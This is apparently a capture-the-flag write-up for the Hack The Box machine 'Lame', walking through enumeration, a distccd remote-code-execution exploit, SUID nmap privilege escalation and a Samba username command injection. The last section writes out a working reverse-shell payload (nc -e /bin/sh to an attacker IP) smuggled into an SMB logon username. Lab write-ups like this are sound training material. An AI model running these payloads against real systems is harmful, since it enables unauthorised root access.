Hack The Box: Beginner Track - Lame


This is the first machine of the Hack The Box Beginner Track: “LAME”.


Lame


The box is tagged “injection”, “CMS exploit”, “Linux”, “Web”, “PHP” and “Password Reuse”.

Enumeration

We run sudo nmap -sC -sV <IP> and find four open ports: 21, 22, 139 and 445. The FTP server on port 21 allows anonymous login, so let's try that first to catch the low-hanging fruit. Meanwhile we can run a full port scan (nmap -p- <IP>), which returns a fifth open port, 3632 (distccd v1).


The FTP server does not seem to contain any files, and it is also not possible to upload files from our side (error 553 Could not create file.).


Next, let's enumerate the SMB shares with smbclient -L <IP> -N; the server also accepts an anonymous (null) session.


We see a share "tmp" which might be accessible. We can list the share's files with smbclient \\\\10.129.136.236\\tmp (just press Enter at the password prompt):


From the share we can download two files: vgauthsvclog.txt.0 and .X0-lock. The rest is not accessible with our anonymous account. We try the same with the opt share, but this one does not let us in anonymously.

The first file is a log of the "VGAuthService" (a VMware guest tool), and the .X0-lock file contains a single number: 5703. A .X0-lock file normally just holds the PID of the X server for display :0, so neither file is of much use on its own.


I'm not sure how to use these, so let's check out the last open port with the "distccd" service.

Googling for the term "distccd v1" immediately turns up several exploits, for example this GitHub link [1], which leads to remote code execution: distccd executes whatever "compiler" command the client names in its request, so a client can simply ask it to run sh.


Initial Foothold

After downloading and running the GitHub exploit, I received a shell (note that it needs to be run with python2, not python3). We end up as user daemon in the /tmp directory, to which we already had access via smbclient.

On the machine, we find four user directories under /home: ftp, makis, service and user. In the makis directory we find the user flag.


Since the daemon user has a shell, I tried to create SSH keys, but unfortunately the user's home directory is not writable (its /etc/passwd entry ends in /usr/sbin:/bin/sh, i.e. home /usr/sbin and shell /bin/sh). But we can upload files to /tmp through the tmp share with smbclient (put). So let's put the linpeas script there and run it for enumeration.


Privilege Escalation

Linpeas gives us a friendly red-orange hint that the SUID bit on nmap is exploitable, which GTFOBins confirms: the old nmap version on the box still has an --interactive mode, and !sh from that prompt spawns a shell that inherits nmap's root privileges. I followed the instructions in this blog post [2] and got a root shell!



Alternative Solution

After I finished the box, I watched a YouTube walkthrough and learned that there is an even simpler way to get root directly: RCE through the SMB server, with no intermediate steps.

The bug in this Samba version is that shell commands embedded in the username are executed on the server while we are attempting an SMB connection, and since smbd runs as root, so does the injected command. With a listener running on our side (nc -lvnp 4444) and a connection opened with smbclient //10.129.136.236/tmp -N, all we need to type at the smb: \> prompt is: logon "./=`nohup nc -e /bin/sh 10.10.16.28 4444`". The backticks are evaluated on the target, and the listener receives a root shell.



  1. https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

  2. https://vk9-sec.com/nmap-privilege-escalation/